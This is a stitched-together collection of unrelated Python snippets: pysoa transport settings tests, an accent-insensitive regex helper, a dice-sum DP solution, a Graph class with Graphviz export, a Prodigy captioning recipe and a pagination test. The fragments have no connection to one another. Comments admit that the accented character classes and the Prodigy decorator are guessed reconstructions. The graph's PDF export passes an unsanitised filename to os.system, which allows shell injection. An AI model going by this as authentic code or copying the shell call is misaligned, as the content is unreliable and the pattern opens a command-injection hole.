        settings_dict = {'test_service': {'transport': {'path': 'pysoa.common.transport.redis_gateway.client:RedisClientTransport', 'kwargs': {'backend_type': REDIS_BACKEND_TYPE_STANDARD, 'default_serializer_config': {'path': 'pysoa.common.serializer:JSONSerializer'}}}}}
        client = Client(settings_dict)
        handler = client._get_handler('test_service')
        assert isinstance(handler.transport, RedisClientTransport)
        assert (handler.transport._send_queue_name == 'service.test_service')
        assert isinstance(handler.transport.core, RedisTransportCore)
        assert (handler.transport.core.backend_type == REDIS_BACKEND_TYPE_STANDARD)
        assert isinstance(handler.transport.core.default_serializer, JSONSerializer)

    def test_server_settings(self):
        # Same wiring on the server side, with an explicit JSON serializer.
        class _TestServer(Server):
            service_name = 'geo_tag'
        settings_dict = {'transport': {'path': 'pysoa.common.transport.redis_gateway.server:RedisServerTransport', 'kwargs': {'backend_type': REDIS_BACKEND_TYPE_STANDARD, 'default_serializer_config': {'path': 'pysoa.common.serializer:JSONSerializer'}}}}
        server = _TestServer(ServerSettings(settings_dict))
        assert isinstance(server.transport, RedisServerTransport)
        assert (server.transport._receive_queue_name == 'service.geo_tag')
        assert isinstance(server.transport.core, RedisTransportCore)
        assert (server.transport.core.backend_type == REDIS_BACKEND_TYPE_STANDARD)
        assert isinstance(server.transport.core.default_serializer, JSONSerializer)

    def test_server_settings_generic_with_defaults(self):
        # With no serializer configured the server defaults to msgpack.
        class _TestServer(Server):
            service_name = 'tag_geo'
        settings_dict = {'transport': {'path': 'pysoa.common.transport.redis_gateway.server:RedisServerTransport', 'kwargs': {'backend_type': REDIS_BACKEND_TYPE_STANDARD}}}
        server = _TestServer(ServerSettings(settings_dict))
        assert isinstance(server.transport, RedisServerTransport)
        assert (server.transport._receive_queue_name == 'service.tag_geo')
        assert isinstance(server.transport.core, RedisTransportCore)
        assert (server.transport.core.backend_type == REDIS_BACKEND_TYPE_STANDARD)
        assert isinstance(server.transport.core.default_serializer, MsgpackSerializer)

    def test_server_settings_fails_with_client_transport(self):
        # A client transport class must be rejected by the server schema.
        settings_dict = {'transport': {'path': 'pysoa.common.transport.redis_gateway.client:RedisClientTransport', 'kwargs': {'backend_type': REDIS_BACKEND_TYPE_STANDARD}}}
        with pytest.raises(Settings.ImproperlyConfigured) as error_context:
            ServerSettings(settings_dict)
        assert ('is not one of or a subclass of one of' in error_context.value.args[0])

    def test_client_settings_fails_with_server_transport(self):
        # A server transport class must be rejected by the client schema.
        settings_dict = {'transport': {'path': 'pysoa.common.transport.redis_gateway.server:RedisServerTransport', 'kwargs': {'backend_type': REDIS_BACKEND_TYPE_STANDARD}}}
        with pytest.raises(Settings.ImproperlyConfigured) as error_context:
            ClientSettings(settings_dict)
        assert ('is not one of or a subclass of one of' in error_context.value.args[0])
        assert ('RedisServerTransport' in error_context.value.args[0])

    def test_client_settings_fails_with_invalid_path(self):
        # A dotted path naming a missing attribute must raise with a clear message.
        settings_dict = {'transport': {'path': 'pysoa.common.transport.redis_gateway.server:NonExistentTransport', 'kwargs': {'backend_type': REDIS_BACKEND_TYPE_STANDARD}}}
        with pytest.raises(Settings.ImproperlyConfigured) as error_context:
            ClientSettings(settings_dict)
        assert ('has no attribute' in error_context.value.args[0])
        assert ('NonExistentTransport' in error_context.value.args[0])

    def test_server_settings_fails_with_invalid_serializer(self):
        # A non-serializer class configured as serializer must be rejected.
        settings_dict = {'transport': {'path': 'pysoa.common.transport.redis_gateway.server:RedisServerTransport', 'kwargs': {'backend_type': REDIS_BACKEND_TYPE_STANDARD, 'default_serializer_config': {'path': 'pysoa.server.middleware:ServerMiddleware'}}}}
        with pytest.raises(Settings.ImproperlyConfigured) as error_context:
            ServerSettings(settings_dict)
        assert ('is not one of or a subclass of one of' in error_context.value.args[0])
        assert ('ServerMiddleware' in error_context.value.args[0])

    def test_server_settings_fails_with_client_middleware(self):
        # Client middleware is rejected by the server schema; the matching
        # server middleware path then validates cleanly.
        settings_dict = {'transport': {'path': 'pysoa.common.transport.redis_gateway.server:RedisServerTransport', 'kwargs': {'backend_type': REDIS_BACKEND_TYPE_STANDARD}}, 'middleware': [{'path': 'pysoa.client.middleware:ClientMiddleware'}]}
        with pytest.raises(Settings.ImproperlyConfigured) as error_context:
            ServerSettings(settings_dict)
        assert ('is not one of or a subclass of one of' in error_context.value.args[0])
        assert ('ClientMiddleware' in error_context.value.args[0])
        settings_dict['middleware'][0]['path'] = 'pysoa.server.middleware:ServerMiddleware'
        ServerSettings(settings_dict)

    def test_client_settings_fails_with_server_middleware(self):
        # Mirror case: server middleware is rejected by the client schema.
        settings_dict = {'transport': {'path': 'pysoa.common.transport.redis_gateway.client:RedisClientTransport', 'kwargs': {'backend_type': REDIS_BACKEND_TYPE_STANDARD}}, 'middleware': [{'path': 'pysoa.server.middleware:ServerMiddleware'}]}
        with pytest.raises(Settings.ImproperlyConfigured) as error_context:
            ClientSettings(settings_dict)
        assert ('is not one of or a subclass of one of' in error_context.value.args[0])
        assert ('ServerMiddleware' in error_context.value.args[0])
        settings_dict['middleware'][0]['path'] = 'pysoa.client.middleware:ClientMiddleware'
        ClientSettings(settings_dict)
def replace_vowels_with_accented_regex(text):
    """Expand each vowel in *text* into a regex character class that also
    matches its accented variants, making the result accent-insensitive.

    Bug fixed: the original character classes had been ASCII-folded during
    extraction (e.g. ``'[aaaaaaaaa]'``), turning every class into a no-op.
    The accented sets below are a reconstruction sized to the original class
    lengths — TODO confirm the exact glyphs against version control.
    """
    # Each class starts with the plain letter and contains only non-ASCII
    # accents otherwise, so the replacement order cannot self-interfere.
    accent_classes = {
        'a': '[aàáâãäåāă]', 'u': '[uùúûüū]', 'o': '[oòóôõö]',
        'e': '[eèéêëēĕė]', 'i': '[iìíîïĩī]', 'y': '[yýÿŷỳ]',
        'A': '[AÀÁÂÃÄÅĀ]', 'U': '[UÙÚÛÜŪ]', 'O': '[OÒÓÔÕÖ]',
        'E': '[EÈÉÊËĒĔĖ]', 'I': '[IÌÍÎÏĨĪ]', 'Y': '[YÝŸŶỲ]',
    }
    for vowel, char_class in accent_classes.items():
        text = text.replace(vowel, char_class)
    return text
class Solution():
    def numRollsToTarget(self, n: int, k: int, target: int) -> int:
        """Count the ways n dice with faces 1..k can sum to target, mod 1e9+7.

        Rolling DP over one die at a time; each row is filled with a sliding
        window over the previous row (sum of the last k entries), so the whole
        computation is O(n * target) instead of O(n * target * k).
        """
        # Impossible targets: below n (all ones) or above n*k (all max faces).
        if not (n <= target <= n * k):
            return 0
        mod = 10 ** 9 + 7
        size = max(k, target) + 1
        # Base case: one die reaches each total 1..k exactly one way.
        ways = [0] * size
        for face in range(1, k + 1):
            ways[face] = 1
        # Add the remaining n-1 dice one at a time.
        for _ in range(n - 1):
            nxt = [0] * size
            window = 0  # running sum of ways[total-k .. total-1]
            for total in range(1, size):
                window += ways[total - 1]
                if total - k - 1 > 0:
                    window -= ways[total - k - 1]
                window %= mod
                nxt[total] = window
            ways = nxt
        return ways[target]
class Graph():
    """Directed graph of Vertex_Root nodes with a name registry, unique-id
    allocation, and Graphviz debug output."""

    def __init__(self):
        self.vertices = set()   # every vertex in the graph
        self.names = {}         # name -> vertex registry
        self.uid_counter = 0    # last uid handed out

    def get_next_uid(self):
        """Allocate and return the next unique vertex id (1-based)."""
        self.uid_counter += 1
        return self.uid_counter

    def get_named_vertex(self, name):
        """Return the vertex registered under *name*; raise ICE if unknown."""
        assert isinstance(name, str)
        if name not in self.names:
            raise ICE('attempted to get named vertex %s that does not exists' % name)
        return self.names[name]

    def add_edge(self, src, dst):
        """Insert the directed edge src -> dst (both must belong to this graph)."""
        assert isinstance(src, Vertex_Root)
        assert isinstance(dst, Vertex_Root)
        assert (src.graph == self)
        assert (dst.graph == self)
        src.out_edges.add(dst)
        dst.in_edges.add(src)

    def remove_edge(self, src, dst):
        """Remove the edge src -> dst if present; a missing edge is a no-op."""
        assert isinstance(src, Vertex_Root)
        assert isinstance(dst, Vertex_Root)
        assert (src.graph == self)
        assert (dst.graph == self)
        if dst in src.out_edges:
            src.out_edges.remove(dst)
            dst.in_edges.remove(src)

    def debug_write_dot(self, filename):
        """Write the graph in Graphviz dot format to <filename>.dot."""
        with open(filename + '.dot', 'w', encoding='UTF-8') as fd:
            fd.write('digraph G {\n')
            # Vertices first, sorted for deterministic output.
            for vert in sorted(self.vertices):
                fd.write(' %u [label="%s"];\n' % (vert.uid, vert.dot_label()))
            fd.write('\n')
            # Then every edge, again in sorted order.
            for src in sorted(self.vertices):
                for dst in sorted(src.out_edges):
                    fd.write(' %u -> %u;\n' % (src.uid, dst.uid))
            fd.write('}\n')

    def debug_write_pdf(self, filename):
        """Render the graph to <filename>.pdf via the external `dot` tool."""
        self.debug_write_dot(filename)
        os.system('dot -Tpdf -o%s.pdf %s.dot' % (filename, filename))

    def count_vertices(self):
        """Number of vertices in the graph."""
        return len(self.vertices)

    def count_edges(self):
        """Total number of directed edges in the graph."""
        return sum(len(vert.out_edges) for vert in self.vertices)
# NOTE(review): the original decorator was mangled to a bare "('image-caption')"
# (a syntax error). Restored as the canonical Prodigy recipe registration —
# confirm the exact decorator form (prodigy.recipe vs a bare `recipe` import)
# against version control.
@prodigy.recipe('image-caption')
def image_caption(dataset, images_path):
    """Prodigy recipe: stream images and collect a free-text caption for each.

    :param dataset: name of the dataset annotations are saved to
    :param images_path: directory of images to load into the stream
    :return: recipe components dict (dataset, stream, blocks UI config)
    """
    stream = Images(images_path)
    # Two stacked UI blocks: the image itself, then an autofocused text input
    # whose value is stored under the 'caption' field.
    blocks = [
        {'view_id': 'image'},
        {'view_id': 'text_input', 'field_id': 'caption', 'field_autofocus': True},
    ]
    return {'dataset': dataset, 'stream': stream, 'view_id': 'blocks',
            'config': {'blocks': blocks}}
def test_offset_with_parsable_string_connector_param_reference(response_with_body):
    """A string-valued connector-param limit should parse and the page should advance by one."""
    pagination_config = OffsetPaginationConfiguration(
        incremental_param='page', increment_by=1, limit={'connector_param': 'limit'})
    strategy = OffsetPaginationStrategy(pagination_config)
    initial_params: SaaSRequestParams = SaaSRequestParams(
        method=HTTPMethod.GET, path='/conversations', query_params={'page': 1})
    # The '10' limit arrives as a string and must be coerced, not rejected.
    result: Optional[SaaSRequestParams] = strategy.get_next_request(
        initial_params, {'limit': '10'}, response_with_body, 'conversations')
    assert result == SaaSRequestParams(
        method=HTTPMethod.GET, path='/conversations', query_params={'page': 2})